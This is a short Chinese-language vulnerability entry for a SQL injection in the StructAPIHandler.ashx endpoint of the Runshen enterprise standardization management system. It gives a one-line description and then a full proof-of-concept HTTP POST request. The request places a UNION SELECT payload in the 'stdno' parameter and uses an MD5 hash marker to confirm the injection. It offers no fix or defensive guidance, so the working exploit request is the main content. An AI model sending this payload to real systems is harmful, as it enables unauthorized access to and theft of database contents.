漏洞描述
润申企业标准化管理系统StructAPIHandler.ashx SQL注入,攻击者可通过该漏洞获取数据库敏感数据。
润申企业标准化管理系统StructAPIHandler.ashx SQL注入
PoC代码
POST /PDCA/ashx/StructAPIHandler.ashx?action=GetQiang HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Length: 168
Content-Type: application/x-www-form-urlencoded
Cookie:
Accept-Encoding: gzip
stdno=-1 union select 1,2,3,4,5,6,7,8,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27jyywqlnd%27)),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--